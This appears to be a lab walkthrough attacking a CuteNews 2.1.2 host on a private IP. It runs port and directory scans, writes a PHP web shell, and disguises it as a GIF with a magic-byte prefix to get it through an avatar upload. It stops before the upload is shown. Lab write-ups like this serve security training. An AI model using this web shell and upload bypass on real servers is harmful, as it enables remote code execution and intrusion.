┌──(kali㉿GNOME)-[~]
└─$ rustscan -a 192.168.160.128
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
110/tcp open pop3 syn-ack
995/tcp open pop3s syn-ack
┌──(kali㉿GNOME)-[~]
└─$ nmap -sC -sV -Pn 192.168.160.128 -p 22,80,88,110,995
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA)
| 256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA)
|_ 256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
88/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: 404 Not Found
110/tcp open pop3 Courier pop3d
|_pop3-capabilities: IMPLEMENTATION(Courier Mail Server) UTF8(USER) USER PIPELINING STLS UIDL TOP LOGIN-DELAY(10)
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:[email protected]
| Not valid before: 2020-09-17T16:28:06
|_Not valid after: 2021-09-17T16:28:06
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Courier pop3d
|_pop3-capabilities: IMPLEMENTATION(Courier Mail Server) UTF8(USER) TOP PIPELINING UIDL USER LOGIN-DELAY(10)
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:[email protected]
| Not valid before: 2020-09-17T16:28:06
|_Not valid after: 2021-09-17T16:28:06
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿GNOME)-[~]
└─$ gobuster dir -u http://192.168.160.128:80/ -w /usr/share/wordlists/dirb/common.txt -q -t 100
/.htpasswd (Status: 403) [Size: 280]
/.htaccess (Status: 403) [Size: 280]
/.hta (Status: 403) [Size: 280]
/core (Status: 301) [Size: 317] [--> http://192.168.160.128/core/]
/docs (Status: 301) [Size: 317] [--> http://192.168.160.128/docs/]
/favicon.ico (Status: 200) [Size: 1150]
/index.html (Status: 200) [Size: 10701]
/index.php (Status: 200) [Size: 6175]
/libs (Status: 301) [Size: 317] [--> http://192.168.160.128/libs/]
/manual (Status: 301) [Size: 319] [--> http://192.168.160.128/manual/]
/server-status (Status: 403) [Size: 280]
/skins (Status: 301) [Size: 318] [--> http://192.168.160.128/skins/]
/uploads (Status: 301) [Size: 320] [--> http://192.168.160.128/uploads/]
There is a login portal at /index.php.
As we can see, it is CuteNews 2.1.2.
After a quick search I found a lot of Metasploit modules and other Python PoCs, but none of them works because I do not have login credentials.
I ended up finding this Medium post: https://musyokaian.medium.com/cutenews-2-1-2-remote-code-execution-vulnerability-450f29673194
Now we craft a simple PHP file that runs whatever is passed in the cmd GET parameter and echoes the output, and save it as malicious.php
<?php echo system($_GET["cmd"]); ?>
┌──(kali㉿GNOME)-[~/Desktop]
└─$ file malicious.php
malicious.php: PHP script, ASCII text
As we can see, file identifies it as a PHP script by default. After adding GIF8; as its first line, file reports a GIF image instead: libmagic only looks at the leading bytes, and GIF8 is the start of the GIF87a/GIF89a signature. The .php extension, and what Apache will do with the file once it is served from the web root, are unchanged; only the content sniff is fooled.
┌──(kali㉿GNOME)-[~/Desktop]
└─$ cat malicious.php
GIF8;
<?php echo system($_GET["cmd"]); ?>
┌──(kali㉿GNOME)-[~/Desktop]
└─$ file malicious.php
malicious.php: GIF image data 16188 x 26736
But when I moved on to register an account, I found there is a CAPTCHA, which is not what the Medium blog post shows.
I tried refreshing the CAPTCHA, but no luck.
After a few tries, though, I was able to get the CAPTCHA by intercepting the request in Burp and checking the response: the image does not render on the front end, but it does show up in the intercepted response in Burp.
Register Successful
Clicking on Personal Options, I found this upload tab.
Right-clicking on the avatar and choosing Open image in new tab reveals the file path under /uploads; browsing the /uploads directory from the gobuster result on its own does not show anything.